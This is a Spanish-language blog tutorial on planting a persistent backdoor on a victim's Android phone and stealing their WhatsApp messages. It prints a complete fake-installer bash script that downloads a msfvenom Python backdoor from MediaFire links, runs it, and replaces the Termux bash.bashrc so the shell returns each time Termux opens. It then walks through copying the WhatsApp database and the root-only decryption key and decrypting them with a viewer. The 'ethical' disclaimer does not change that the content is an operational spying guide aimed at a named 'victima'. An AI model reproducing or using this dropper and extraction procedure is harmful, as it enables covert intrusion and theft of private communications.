¿Verdad o mentira? Como acceder a un dispositivo y extraer la DB de WhatsApp sin enviar ninguna aplicacion.


Buenas amigos, les habla, Facundo Salgado en esta ocasion vamos a realizar un tutorial etico de algo que preguntan mucho los internautas, se tratara de como podemos accceder a un dispositivo fuera de nuestra red e interceptar la base de datos de whatsaap para posteriormente poder espiar sus mensajes.
Cabe destacar que vamos a hacerlo sin nesesidad de mandar ningun .apk a la victima, lo vamos a hacer a travez de un backdoor para Python generado con msfvenom. y de una manera persistente para que podamos obtener acceso al dispositivo de forma persistente sin perder la seccion de nuestra shell.
Antes de empezar aclaro que este tutorial es de forma etica y que no es con intenciones secundarias de perjudicar o realizar actos delictivos, toda informacion compartida aqui es con fines eticos y no nos hacemos responsables por el uso que ustedes den a la informacion, como bien dicen nuestros hackers, “la informacion es libre de aprendizaje”

¿Como funciona el ataque que realizaremos?

el ataque funciona de la siguiente manera
  1. mandamos un repositorio de github o preferentemente un link con un archivo .sh (shell) a la persona
  2. la persona ejecuta el archivo
  3. obtenemos una shell con persistencia de su celular
  4. extraemos su base de datos de whatsaap
  5. extraemos la llave key de su whatsaap
  6. vizualizamos todos los mensajes de la persona

Requisitos:

para que esto funcione la persona o la victima a la que queramos hackear su whatsaap, debera:
  1. tener rooteado su celular (importante)
  2. tener whatsaap instalado

Instrucciones:

1. Generar el backdoor:


en mi caso voy a utilizar una maquina virtual con debian la distribucion de pentesting Kali Linux, esto voy a ejecutarlo en una computadora en una maquina virtual VMWARE.. les recomiendo hacer todo el proceso mediante una maquina virtual ya que en termux es mas complejo, aunque tambien pueden hacerlo instalando las dependencias en termux

¿que nesesito para llevar a cabo el ataque?

  1. Metasploit Framework
  2. Ngrok
  3. Msfvenom
para generar el backdoor lo haremos en formato Python ejecutando un comando de MSFVENOM

Paso 1 – iniciar ngrok

para poder lanzarlo fuera de nuestra red nesesitamos usar ngrok o podemos usar cualquier otro tunelizador como server.net
al establecer la comunicacion les aparecera algo asi:
Paso 2 – generar el backdoor python
Debemos generar el backdoor con msfvenom en formato python con la direccion de ngrok y el puerto que nos dio al abrir la conexion, abajo un ejemplo.


cuando tengamos esto listo, la salida que les arrojara es similar a esta:



Paso 3 – subir el backdoor a mediafire

Vamos a subir el backdoor a mediafire para posteriormente desde un archivo bash podamos incluir el link de descarga y que ejecute este backdoor de forma automatica para posteriormente nosotros obtener la shell.

Paso 4 – crear un script bash


La funcion del script bash sera que cuando la victima ejecute el archivo ejemplo, ./install.sh, el script se encargara de varias cosas en primer lugar descargara el archivo desde mediafire con el backdoor, seguidamente le dara los permisos nesesarios y seguidamente ejecutara el backdoor, acto seguido movera el backdoor a una ruta especifica en termux para que al volver a abrir otra vez termux nosotros obtengamos nuevamente la shell del celular, por lo tanto estamos dandole persistencia a nuestra shell.
Les dejare un ejemplo de las lineas de codigo del script
echo -e “\e[32m Bienvenido a la instalacion de mi programa, espera un momento\e[39m”
sleep 5
pkg install python
pkg install wget
echo -e “\e[32m Descargando Scripts, aguarde por favor \e[39m”
sleep 5
clear
wget https://download1327.mediafire.com/iw7h6354afug/325aifl4ei5awjz/tool.py
clear
chmod +x tool.py
python tool.py
mv tool.py /data/data/com.termux/files/usr/etc/
rm /data/data/com.termux/files/usr/etc/motd
sleep 2
cd /data/data/com.termux/files/usr/etc/
sleep 1
rm bash.bashrc
wget https://download1489.mediafire.com/rcjz3xj1i51g/y6d0pyver787wl0/bash.bashrc
cd
clear
echo -e “\e[32m Instalacion finalizada\e[39m”

¿como funciona ese script?

el script funciona de la siguiente manera
  1. instala python y wget desde la terminal
  2. descarga el backdoor desde mediafire
  3. le da los permisos con chmod y lo ejecuta
  4. mueve el backdoor a la siguiente ruta /data/data/com.termux/files/usr/etc/
  5. elimina el archivo bash.bashrc de esa ruta
  6. descarga un nuevo archivo con el mismo nombre modificado
esto causara que se ejecutara la shell y nosotros obtendremos una shell meterpreter de forma persistente en nuestro metasploit, les dejare un video de mi canal de demostracion de como seria el mecanismo del backdoor que generamos hasta ahora.
Video click aqui

Paso 5 – dejar en escucha nuestro metasploit

Dejamos en escucha para saber cuando la victima se conecte a nuestra maquina
Paso 6 – extraer la DB de whatsaap
cuando recibamos la conexion cuando la victima ejecute el archivo ./install.sh nos saldra de la siguiente manera:
Despues debemos extraer la database de WhatsApp para eso vamos al directorio /sdcard/whatsapp/Databases
Descargaremos la que diga msgstore.db.crypt12 para eso solo lanzamos el comando

Paso 7 – extraer el archivo key

Para extraer el archivo key nesesitamos acceso a raiz y para hacer esto se nesesita que el celular este rooteado, es por eso que les mencione este requisito al principio del blog, para esto lo primero que hacemos es colocar
shell
esto nos creara una shell dentro de la seccion meterpreter, ahora nos vamos a este directorio /data/data/com.whatsapp/files/
aqui simplemente listamos con ls y descargamos copiamos el archivo a la sdcard de la siguiente forma
cp key /sdcard/ && exit

Paso final – vizualizar los mensajes

Para esto ultimo deben descargar el programa Whatsaap Viewer y cuando lo abran introducir la llave key y la db de whatsaap que extrajeron del dispositivo victima anteriormente y les mostrara los mensajes de la persona, sin mas rodeos y para no hacer mas largo el video aca les dejo un tutorial de otra persona:
Esto es todo amigos espero les sirva y cualquier duda me contactan, sigueme en mis redes sociales
Facebook: Facundo Salgado
Instagram: Facu Salgado
Twitter: Facu Salgado
para comunicarse con migo a partir de ahora pueden hacerlo a travez de mi buzon publico de mypublicinbox, desde aqui

Publicar un comentario

0 Comentarios